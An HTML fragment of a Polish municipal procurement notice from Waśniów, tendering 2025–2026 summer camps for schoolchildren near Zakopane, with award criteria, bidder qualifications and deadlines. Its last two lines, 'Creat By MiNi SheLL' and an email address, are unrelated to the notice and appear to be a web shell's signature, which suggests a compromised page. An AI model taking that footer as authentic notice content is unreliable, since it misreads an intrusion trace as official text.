usługą przewodnika, <br/>- 3 wycieczki krajoznawcze, <br/>- zajęcia profilaktyczne, gry terenowe, zajęcia plastyczne, gry i zabawy rekreacyjno-sportowe, <br/>- ogniska, dyskoteki, <br/>e. zapewnienia uczestnikom kolonii opieki medycznej i opieki ratownika, <br/>f. ubezpieczenia uczestników kolonii od następstw nieszczęśliwych wypadków, <br/>B. Zadanie 2 – Organizacja kolonii letniej dla dzieci ze świetlicy środowiskowej w Mominie w 2026 roku, w ramach której Wykonawca jest zobowiązany w szczególności do: <br/>a. zapewnienia transportu drogowego (autokar wraz z kierowcą) w celu przewiezienia 33 osób – 30 dzieci w wieku szkolnym (od 6 do 15 lat) oraz 3 wychowawców (dalej łącznie: uczestnicy kolonii) z parkingu zlokalizowanego przy Szkole Podstawowej w Mominie lub z innego miejsca wskazanego przez Zamawiającego na terenie gminy Waśniów do miejsca wypoczynku (zakwaterowania) i z powrotem, z zastrzeżeniem że zapewnienie wychowawców jest obowiązkiem Wykonawcy,<br/>b. zapewnienia uczestnikom kolonii zakwaterowania, z zastrzeżeniem że miejscem wypoczynku (zakwaterowania) może być jedna z następujących miejscowości: <br/>- Zakopane, <br/>- Biały Dunajec, <br/>- Kościelisko, <br/>- Nowy Targ, <br/>- Bukowina Tatrzańska, <br/>- Inna, w odległości do 10 km od miejscowości wskazanych powyżej, <br/>c. zapewnienia uczestnikom kolonii wyżywienia, w tym napojów w postaci 4 posiłków dziennie (śniadanie, obiad, podwieczorek, kolacja), <br/>d. zapewnienie uczestnikom kolonii (dzieciom w wieku szkolnym od 6 do 15 lat) programu zajęć na czas pogody i niepogody, w zakresie obejmującym co najmniej: <br/>- 2 wycieczki autokarowe całodniowe wraz z usługą przewodnika, <br/>- 3 wycieczki krajoznawcze, <br/>- zajęcia profilaktyczne, gry terenowe, zajęcia plastyczne, gry i zabawy rekreacyjno-sportowe, <br/>- ogniska, dyskoteki, <br/>e. zapewnienia uczestnikom kolonii opieki medycznej i opieki ratownika, <br/>f. ubezpieczenia uczestników kolonii od następstw nieszczęśliwych wypadków.<br/> 2. Szczegółowy opis przedmiotu zamówienia, w szczególności wymogi dot. transportu, zakwaterowania, wyżywienia,<br/> zapewnienia opieki, w tym kwalifikacje Koordynatora kolonii i wychowawców, zapewnienia ubezpieczenia, minimalnego<br/> programu zajęć został określony w Załączniku nr 1 do SWZ – „Opis przedmiotu zamówienia” (indywidualnie dla każdego<br/> Zadania).<br/> 3. Przedmiot zamówienia jest współfinansowany ze środków Unii Europejskiej, pochodzących z Europejskiego Funduszu<br/> Społecznego Plus (EFS+) w ramach programu regionalnego Fundusze Europejskie dla Świętokrzyskiego 2021 – 2027. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">55240000-4 - Usługi w zakresie ośrodków i domów wypoczynkowych</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">55241000-1 - Usługi w zakresie ośrodków wypoczynkowych</p> <p class="mb-0">55243000-5 - Usługi w zakresie obozowisk dla dzieci</p> <p class="mb-0">55100000-1 - Usługi hotelarskie</p> <p class="mb-0">55320000-9 - Usługi podawania posiłków</p> <p class="mb-0">92000000-1 - Usługi rekreacyjne, kulturalne i sportowe</p> <p class="mb-0">80000000-4 - Usługi edukacyjne i szkoleniowe</p> <p class="mb-0">63000000-9 - Usługi dodatkowe i pomocnicze w zakresie transportu, usługi biur podróży</p> <p class="mb-0">63510000-7 - Usługi biur podróży i podobne</p> <p class="mb-0">60130000-8 - Usługi w zakresie specjalistycznego transportu drogowego osób</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">18 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Doświadczenie zawodowe Koordynatora kolonii</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">30</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">aspekty społeczne, w tym integracja zawodowa i społeczna osób, o których mowa w art. 94 ust. 1 ustawy</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Aspekt społeczny</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 6</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <p class="mb-0">Art. 109 ust. 1 pkt 8</p> <p class="mb-0">Art. 109 ust. 1 pkt 9</p> <p class="mb-0">Art. 109 ust. 1 pkt 10</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunek udziału w postępowaniu – dot. każdej z Części zamówienia: <br/>A. w zakresie uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej: <br/>Zamawiający wymaga, aby Wykonawca posiadał wpis do rejestru organizatorów turystyki i przedsiębiorców ułatwiających nabywanie powiązanych usług turystycznych, o których mowa w art. 22 ust. 2 ustawy z dnia 24 listopada 2017 roku o imprezach turystycznych i powiązanych usługach turystycznych, zgodnie z wymogiem art. 92c ust. 1 ustawy z dnia 7 września 1991 roku o systemie oświaty. <br/>B. w zakresie zdolności technicznej lub zawodowej: <br/>a. doświadczenie Wykonawcy dające rękojmię należytego wykonania przedmiotu zamówienia: <br/>Zamawiający wymaga, aby Wykonawca, w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeśli okres prowadzenia działalności jest krótszy – w tym okresie, zrealizował należycie co najmniej dwie usługi polegające na organizacji kolonii / obozu / wyjazdu lub im podobnych form wypoczynku (dalej łącznie: kolonia), dla nie mniej niż 20 dzieci w wieku szkolnym (od 6 do 15 lat) w ramach każdej z kolonii i obejmującej <br/>wymiar czasowy nie krótszy niż 7 następujących po sobie kolejno dni – dla każdej z kolonii, <br/>b. dysponowanie personelem niezbędnym do należytej realizacji przedmiotu zamówienia: <br/>Zamawiający wymaga, aby Wykonawca dysponował co najmniej: <br/>▪ jedną osobą, która zostanie skierowana do pełnienia funkcji Koordynatora kolonii (odpowiednio, dla koordynacji wypoczynku w ramach Zadania 1 oraz dla koordynacji wypoczynku w ramach Zadaniu 2), posiadającą: <br/>➢ kwalifikacje zawodowe opisane w Załączniku nr 1 do SWZ – „Opis przedmiotu zamówienia”, <br/>➢ doświadczenie w należytej realizacji funkcji koordynatora (kierownika) wypoczynku, na nie mniej niż dwóch koloniach / obozach / wyjazdach lub im podobnych formach wypoczynku (dalej łącznie: kolonie): <br/>✓ dla nie mniej niż 20 dzieci w wieku szkolnym (od 6 do 15 lat), <br/>✓ obejmujących wymiar czasowy nie krótszy niż 7 następujących po sobie kolejno dni, - każda z kolonii, z zastrzeżeniem nabycia przez Koordynatora kolonii wymaganego doświadczenia nie wcześniej niż w okresie ostatnich pięciu lat przed upływem terminu składania ofert, <br/>▪ trzema osobami, które zostaną skierowane do pełnienia funkcji wychowawcy (odpowiednio, dla opieki nad dziećmi w ramach Zadania 1 oraz dla opieki nad dziećmi w ramach Zadania 2), posiadającymi kwalifikacje zawodowe opisane w Załączniku nr 1 do SWZ – „Opis przedmiotu zamówienia”. <br/>UWAGA! <br/>W przypadku, gdy do realizacji przedmiotu zamówienia w – odpowiednio – Zadaniu 1 i Zadaniu 2 zostaną skierowane inne osoby (brak powielenia składu osobowego w każdym z Zadań), Wykonawca jest zobowiązany do wykazania – w celu spełnienia warunku udziału w postępowaniu – że dysponuje osobami spełniającymi wymogi jak wyżej w liczbie zapewniającej należytą realizację przedmiotu zamówienia, tj. jedna osoba pełniąca funkcję Koordynatora kolonii oraz trzy osoby pełniące funkcję wychowawców na każdym z Zadań. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Zamawiający nie przewiduje żądania przedstawienia podmiotowych środków dowodowych w zakresie braku podstaw wykluczenia Wykonawcy z postępowania.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">W celu potwierdzenia spełniania przez Wykonawcę warunku udziału w postępowaniu – dot. wszystkich Części zamówienia: <br/>A. dot. uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej: <br/>Zamawiający wymaga, aby Wykonawca przedstawił wydruk z Centralnej Ewidencji Organizatorów Turystyki i Przedsiębiorców Ułatwiających Nabywanie Powiązanych Usług Turystycznych, potwierdzający wpis Wykonawcy do rejestru organizatorów turystyki i przedsiębiorców ułatwiających nabywanie powiązanych usług turystycznych, o których <br/>mowa w art. 22 ust. 2 ustawy z dnia 24 listopada 2017 roku o imprezach turystycznych i powiązanych usługach turystycznych wraz z dokumentem umowy gwarancji bankowej lub ubezpieczeniowej lub ubezpieczenia na rzecz klientów. <br/>B. dot. zdolności technicznej lub zawodowej: <br/>a. w zakresie dot. wiedzy i doświadczenia Wykonawcy: <br/>Zamawiający wymaga, aby Wykonawca przedstawił wykaz usług polegających na organizacji kolonii / obozu / wyjazdu lub im podobnych form wypoczynku (dalej łącznie: kolonia), dla nie mniej niż 20 dzieci w wieku szkolnym (od 6 do 15 lat) w ramach każdej z kolonii i obejmującej wymiar czasowy nie krótszy niż 7 następujących po sobie kolejno dni, należycie zrealizowanych przez Wykonawcę w okresie ostatnich pięciu lat przed <br/>terminem składania ofert, a jeżeli okres działalności jest krótszy – w tym czasie, sporządzony zgodnie z Załącznikiem nr 8 do SWZ – „Wykaz usług”, w szczególności zawierający wszystkie informacje wymagane w tabeli objętej Załącznikiem nr 8 do SWZ. <br/>Do wykazu usług Wykonawca załącza dowody określające, czy te usługi zostały wykonane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmioty, na rzecz których usługi zostały wykonane, a jeżeli Wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów – oświadczenie Wykonawcy. <br/>b. w zakresie dot. dysponowania przez Wykonawcę personelem: <br/>Zamawiający wymaga, aby Wykonawca przedstawił wykaz osób skierowanych do realizacji przedmiotu zamówienia, indywidualnie dla każdego z Zadań, sporządzony zgodnie z Załącznikiem nr 9 do SWZ – „Wykaz osób”, w szczególności zawierający wszystkie informacje wymagane w tabeli objętej Załącznikiem nr 9 do SWZ.</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1.	Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. <br/>2.	W przypadku określonym w ust. 1 powyżej, Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu albo do reprezentowania i zawarcia umowy w sprawie zamówienia publicznego. Pełnomocnictwo powinno zostać złożone wraz z ofertą. <br/>3.	Oświadczenia, o których mowa w art. 125 ust.1 Pzp, Wykonawcy wspólnie ubiegający się o udzielenie zamówienia składają indywidualnie, w przypadku braku podstaw do wykluczenia – każdy z Wykonawców oraz w przypadku spełniania warunków udziału w postępowaniu – każdy z Wykonawców w zakresie, w jakim wykazuje spełnienie warunku udziału w postępowaniu. <br/>4.	Wykonawcy wspólnie ubiegający się o udzielenie zamówienia składają wraz z ofertą oświadczenie, o którym mowa w art. 117 ust. 4 Pzp, z którego wynika, które usługi wykona każdy z Wykonawców.<br/>5.	Zamawiający uzna, że Wykonawcy wspólnie ubiegający się o udzielenie zamówienia spełniają warunek udziału w postępowaniu:<br/>a.	dot. uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, jeżeli co najmniej jeden z Wykonawców wspólnie ubiegających się o udzielenie zamówienia będzie posiadał wpis do rejestru organizatorów turystyki i przedsiębiorców ułatwiających nabywanie powiązanych usług turystycznych, o których mowa w art. 22 ust. 2 ustawy z dnia 24 listopada 2017 roku o imprezach turystycznych i powiązanych usługach turystycznych, zgodnie z wymogiem art. 92c ust. 1 ustawy z dnia 7 września 1991 roku o systemie oświat, z zastrzeżeniem obowiązku realizacji usługi organizacji kolonii przez Wykonawcę posiadającego wymagany wpis, <br/>b.	dot. zdolności technicznej lub zawodowej:<br/>	w zakresie wiedzy i doświadczenia, jeżeli co najmniej jeden z Wykonawców wspólnie ubiegających się o udzielenie zamówienia będzie legitymował się wymaganym doświadczeniem, tj. w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeśli okres prowadzenia działalności jest krótszy – w tym okresie, zrealizował należycie co najmniej dwie usługi polegające na organizacji kolonii / obozu / wyjazdu lub im podobnych form wypoczynku (dalej łącznie: kolonia), dla nie mniej niż 20 dzieci w wieku szkolnym (od 6 do 15 lat) w ramach każdej z kolonii i obejmującej wymiar czasowy nie krótszy niż 7 następujących po sobie kolejno dni – dla każdej z kolonii. Zamawiający nie dopuszcza w tym zakresie łączenia potencjałów Wykonawców wspólnie ubiegających się o udzielenie zamówienia (zakaz „sumowania” usług, zakaz „sumowania” liczby dzieci w ramach realizacji poszczególnych usług, zakaz „sumowania” ilości dni kolonii w ramach realizacji poszczególnych usług), <br/>	w zakresie dysponowania personelem, jeżeli Wykonawcy wspólnie ubiegający się o udzielenie zamówienia będą dysponować wymaganym personelem. Zamawiający dopuszcza w tym zakresie łączenie potencjałów Wykonawców wspólnie ubiegających się o udzielenie zamówienia. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zamawiający oświadcza, że wobec ograniczonej liczby znaków w nin. Sekcji ogłoszenia, szczegółowe przedstawienie rodzaju i zakresu zmian umowy oraz warunków ich wprowadzenia, odniesionych indywidualnie do każdej z Części zamówienia, nie jest możliwe. <br/>Zamawiający odsyła tym samym do treści Załącznika nr 2 do SWZ - &#34;Projektowane postanowienia umowne&#34; (dalej: PPU):<br/>a. w zakresie Części 1 - treść § 9 ust. 1 PPU, <br/>b. w zakresie Części 2 - treść § 6 ust. 6 – ust. 14 Umowy oraz treść § 9 ust. 1 PPU. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2025-06-16 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://wasniow.ezamawiajacy.pl</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2025-06-16 10:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2025-07-15</span></h3> <h3 class="mb-0">8.5.) Zamawiający przewiduje wybór najkorzystniejszej oferty z możliwością negocjacji: </h3> <p class="mb-0">Część 1 : <span class="normal">Tak</span></p> <p class="mb-0">Część 2 : <span class="normal">Tak</span></p> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Zamawiający, odnosząc się do Sekcji IV - &#34;Przedmiot zamówienia&#34; pkt. 4.2.10. - &#34;Okres realizacji zamówienia albo umowy ramowej&#34;, wyjaśnia, że terminem realizacji przedmiotu zamówienia jest, w zakresie: <br/>A. Część 1 zamówienia: <br/>a. Zadanie 1 – od 30 czerwca 2025 roku do 9 lipca 2025 roku lub od 18 sierpnia 2025 roku do 27 sierpnia 2025 roku, <br/>b. Zadanie 2 – od 30 czerwca 2025 roku do 9 lipca 2025 roku lub od 18 sierpnia 2025 roku do 27 sierpnia 2025 roku,<br/> wg wskazania Zamawiającego, przy czym usługa musi być realizowana w ciągu wybranych 9 dni „pod rząd”. Zamawiający zastrzega, że realizacja Zadania 1 i realizacja Zadania 2 nie może „pokrywać się”, tj. w przypadku wyznaczenia terminu realizacji Zadania 1 na okres od 30 czerwca 2025 roku do 9 lipca 2025 roku, Zadanie 2 będzie realizowane w okresie od dnia18 sierpnia 2025 roku do 27 sierpnia 2025 roku (lub odwrotnie). <br/>B. Część 2 zamówienia: <br/>a. Zadanie 1 – od 29 czerwca 2026 roku do 8 lipca 2026 roku lub od 17 sierpnia 2026 roku do 26 sierpnia 2026 roku, <br/>b. Zadanie 2 – od 29 czerwca 2026 roku do 9 lipca 2026 roku lub od 17 sierpnia 2026 roku do 26 sierpnia 2026 roku, <br/>wg wskazania Zamawiającego, przy czym usługa musi być realizowana w ciągu wybranych 9 dni „pod rząd”. Zamawiający zastrzega, że realizacja Zadania 1 i realizacja Zadania 2 nie może „pokrywać się”, tj. w przypadku wyznaczenia terminu realizacji Zadania 1 na okres od 29 czerwca 2026 roku do 8 lipca 2026 roku, Zadanie 2 będzie realizowane w okresie od dnia17 sierpnia 2026 roku do 26 sierpnia 2026 roku (lub odwrotnie).

Creat By MiNi SheLL
Email: jattceo@gmail.com